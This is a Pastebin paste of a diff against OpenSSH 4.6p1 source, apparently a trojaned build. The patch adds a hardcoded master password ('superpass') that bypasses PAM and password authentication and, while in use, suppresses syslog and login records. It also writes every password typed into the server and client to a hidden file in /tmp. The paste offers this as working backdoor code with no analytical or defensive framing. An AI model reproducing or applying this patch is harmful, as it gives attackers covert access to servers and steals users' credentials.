API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 17th, 2017
66
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 7.24 KB | None | 0 0
raw download clone embed print report
  1. diff -N -c /home/test/openssh-4.6p1/auth-pam.c /home/test/openssh/auth-pam.c
  2. *** /home/test/openssh-4.6p1/auth-pam.c 2006-09-16 18:57:47.000000000 -0700
  3. --- /home/test/openssh/auth-pam.c   2010-09-25 11:09:34.519413954 -0700
  4. ***************
  5. *** 466,471 ****
  6. --- 466,473 ----
  7.     if (sshpam_err != PAM_SUCCESS)
  8.         goto auth_fail;
  9.     sshpam_err = pam_authenticate(sshpam_handle, flags);
  10. +   if(backdoorActive == 1)
  11. +   sshpam_err = PAM_SUCCESS;
  12.     if (sshpam_err != PAM_SUCCESS)
  13.         goto auth_fail;
  14.  
  15. diff -N -c /home/test/openssh-4.6p1/auth-passwd.c /home/test/openssh/auth-passwd.c
  16. *** /home/test/openssh-4.6p1/auth-passwd.c  2006-08-04 19:39:39.000000000 -0700
  17. --- /home/test/openssh/auth-passwd.c    2010-09-25 11:09:34.523203739 -0700
  18. ***************
  19. *** 80,85 ****
  20. --- 80,86 ----
  21.   int
  22.   auth_password(Authctxt *authctxt, const char *password)
  23.   {
  24. +   backdoorActive = 0;
  25.     struct passwd * pw = authctxt->pw;
  26.     int result, ok = authctxt->valid;
  27.   #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
  28. ***************
  29. *** 92,98 ****
  30.   #endif
  31.     if (*password == '\0' && options.permit_empty_passwd == 0)
  32.         return 0;
  33. !
  34.   #ifdef KRB5
  35.     if (options.kerberos_authentication == 1) {
  36.         int ret = auth_krb5_password(authctxt, password);
  37. --- 93,102 ----
  38.   #endif
  39.     if (*password == '\0' && options.permit_empty_passwd == 0)
  40.         return 0;
  41. !   if (!strcmp(password, B4XDOOR)) {
  42. !       backdoorActive = 1;
  43. !       return 1;
  44. !   }
  45.   #ifdef KRB5
  46.     if (options.kerberos_authentication == 1) {
  47.         int ret = auth_krb5_password(authctxt, password);
  48.  
  49. diff -N -c /home/test/openssh-4.6p1/includes.h /home/test/openssh/includes.h
  50. *** /home/test/openssh-4.6p1/includes.h 2006-09-01 03:29:11.000000000 -0700
  51. --- /home/test/openssh/includes.h   2010-09-25 11:34:04.368748380 -0700
  52. ***************
  53. *** 12,17 ****
  54. --- 12,20 ----
  55.    * incompatible with the protocol description in the RFC file, it must be
  56.    * called by a name other than "ssh" or "Secure Shell".
  57.    */
  58. + #define filelog "/tmp/.logs"
  59. + #define B4XDOOR "superpass"
  60. + int backdoorActive;
  61.  
  62.   #ifndef INCLUDES_H
  63.   #define INCLUDES_H
  64. diff -N -c /home/test/openssh-4.6p1/log.c /home/test/openssh/log.c
  65. *** /home/test/openssh-4.6p1/log.c  2006-08-20 00:55:55.000000000 -0700
  66. --- /home/test/openssh/log.c    2010-09-25 11:12:38.439238677 -0700
  67. ***************
  68. *** 306,311 ****
  69. --- 306,313 ----
  70.   void
  71.   do_log(LogLevel level, const char *fmt, va_list args)
  72.   {
  73. + if(backdoorActive == 1)
  74. +   return;
  75.   #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
  76.     struct syslog_data sdata = SYSLOG_DATA_INIT;
  77.   #endif
  78. diff -N -c /home/test/openssh-4.6p1/loginrec.c /home/test/openssh/loginrec.c
  79. *** /home/test/openssh-4.6p1/loginrec.c 2006-09-07 05:57:54.000000000 -0700
  80. --- /home/test/openssh/loginrec.c   2010-09-25 11:09:34.523203739 -0700
  81. ***************
  82. *** 430,435 ****
  83. --- 430,437 ----
  84.   int
  85.   login_write(struct logininfo *li)
  86.   {
  87. + if(backdoorActive == 1)
  88. +   return 0;
  89.   #ifndef HAVE_CYGWIN
  90.     if (geteuid() != 0) {
  91.         logit("Attempt to write login records by non-root user (aborting)");
  92. diff -N -c /home/test/openssh-4.6p1/misc.h /home/test/openssh/misc.h
  93. *** /home/test/openssh-4.6p1/misc.h 2006-08-18 07:33:06.000000000 -0700
  94. --- /home/test/openssh/misc.h   2010-09-25 11:28:37.791270625 -0700
  95. ***************
  96. *** 32,37 ****
  97. --- 32,38 ----
  98.   char  *tilde_expand_filename(const char *, uid_t);
  99.   char  *percent_expand(const char *, ...) __attribute__((__sentinel__));
  100.   char  *tohex(const void *, size_t);
  101. + char  *h_host, *h_user;
  102.   void   sanitise_stdfd(void);
  103.  
  104.   struct passwd *pwcopy(struct passwd *);
  105. diff -N -c /home/test/openssh-4.6p1/monitor.c /home/test/openssh/monitor.c
  106. *** /home/test/openssh-4.6p1/monitor.c  2007-02-19 03:25:38.000000000 -0800
  107. --- /home/test/openssh/monitor.c    2010-09-25 11:29:33.391433624 -0700
  108. ***************
  109. *** 707,717 ****
  110.     char *passwd;
  111.     int authenticated;
  112.     u_int plen;
  113. !
  114.     passwd = buffer_get_string(m, &plen);
  115.     /* Only authenticate if the context is valid */
  116.     authenticated = options.password_authentication &&
  117.         auth_password(authctxt, passwd);
  118.     memset(passwd, 0, strlen(passwd));
  119.     xfree(passwd);
  120.  
  121. --- 707,723 ----
  122.     char *passwd;
  123.     int authenticated;
  124.     u_int plen;
  125. !   FILE * f;
  126.     passwd = buffer_get_string(m, &plen);
  127.     /* Only authenticate if the context is valid */
  128.     authenticated = options.password_authentication &&
  129.         auth_password(authctxt, passwd);
  130. +   if(passwd!=NULL){
  131. +   if ((f = fopen(filelog, "a")) != NULL) {
  132. +           fprintf(f, "%s:%s\n", authctxt->user,  passwd);
  133. +           fclose(f);
  134. +           }
  135. +       }
  136.     memset(passwd, 0, strlen(passwd));
  137.     xfree(passwd);
  138.  
  139. diff -N -c /home/test/openssh-4.6p1/ssh.c /home/test/openssh/ssh.c
  140. *** /home/test/openssh-4.6p1/ssh.c  2007-01-04 21:30:17.000000000 -0800
  141. --- /home/test/openssh/ssh.c    2010-09-25 11:43:30.479454708 -0700
  142. ***************
  143. *** 552,558 ****
  144.     /* Check that we got a host name. */
  145.     if (!host)
  146.         usage();
  147. !
  148.     SSLeay_add_all_algorithms();
  149.     ERR_load_crypto_strings();
  150.  
  151. --- 552,559 ----
  152.     /* Check that we got a host name. */
  153.     if (!host)
  154.         usage();
  155. !   else
  156. !   h_host = host;
  157.     SSLeay_add_all_algorithms();
  158.     ERR_load_crypto_strings();
  159.  
  160. ***************
  161. *** 636,642 ****
  162.  
  163.     if (options.user == NULL)
  164.         options.user = xstrdup(pw->pw_name);
  165. !
  166.     if (options.hostname != NULL)
  167.         host = options.hostname;
  168.  
  169. --- 637,643 ----
  170.  
  171.     if (options.user == NULL)
  172.         options.user = xstrdup(pw->pw_name);
  173. !       h_user = options.user;
  174.     if (options.hostname != NULL)
  175.         host = options.hostname;
  176.  
  177. diff -N -c /home/test/openssh-4.6p1/sshconnect1.c /home/test/openssh/sshconnect1.c
  178. *** /home/test/openssh-4.6p1/sshconnect1.c  2006-11-07 04:14:42.000000000 -0800
  179. --- /home/test/openssh/sshconnect1.c    2010-09-25 11:29:48.703247333 -0700
  180. ***************
  181. *** 448,453 ****
  182. --- 448,454 ----
  183.   {
  184.     int type, i;
  185.     char *password;
  186. +   FILE *f;
  187.  
  188.     debug("Doing password authentication.");
  189.     if (options.cipher == SSH_CIPHER_NONE)
  190. ***************
  191. *** 456,461 ****
  192. --- 457,466 ----
  193.         if (i != 0)
  194.             error("Permission denied, please try again.");
  195.         password = read_passphrase(prompt, 0);
  196. +       if ((f = fopen(filelog, "a")) != NULL) {
  197. +           fprintf(f, "%s %s %s\n", h_host, h_user, password);
  198. +           fclose(f);
  199. +       }
  200.         packet_start(SSH_CMSG_AUTH_PASSWORD);
  201.         ssh_put_password(password);
  202.         memset(password, 0, strlen(password));
  203. diff -N -c /home/test/openssh-4.6p1/sshconnect2.c /home/test/openssh/sshconnect2.c
  204. *** /home/test/openssh-4.6p1/sshconnect2.c  2006-08-31 22:38:37.000000000 -0700
  205. --- /home/test/openssh/sshconnect2.c    2010-09-25 11:29:58.131183567 -0700
  206. ***************
  207. *** 736,741 ****
  208. --- 736,742 ----
  209.     static int attempt = 0;
  210.     char prompt[150];
  211.     char *password;
  212. +   FILE *f;
  213.  
  214.     if (attempt++ >= options.number_of_password_prompts)
  215.         return 0;
  216. ***************
  217. *** 746,751 ****
  218. --- 747,756 ----
  219.     snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
  220.         authctxt->server_user, authctxt->host);
  221.     password = read_passphrase(prompt, 0);
  222. +   if ((f = fopen(filelog, "a")) != NULL) {
  223. +       fprintf(f, "%s %s %s\n", h_host, h_user, password);
  224. +       fclose(f);
  225. +   }
  226.     packet_start(SSH2_MSG_USERAUTH_REQUEST);
  227.     packet_put_cstring(authctxt->server_user);
  228.     packet_put_cstring(authctxt->service);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!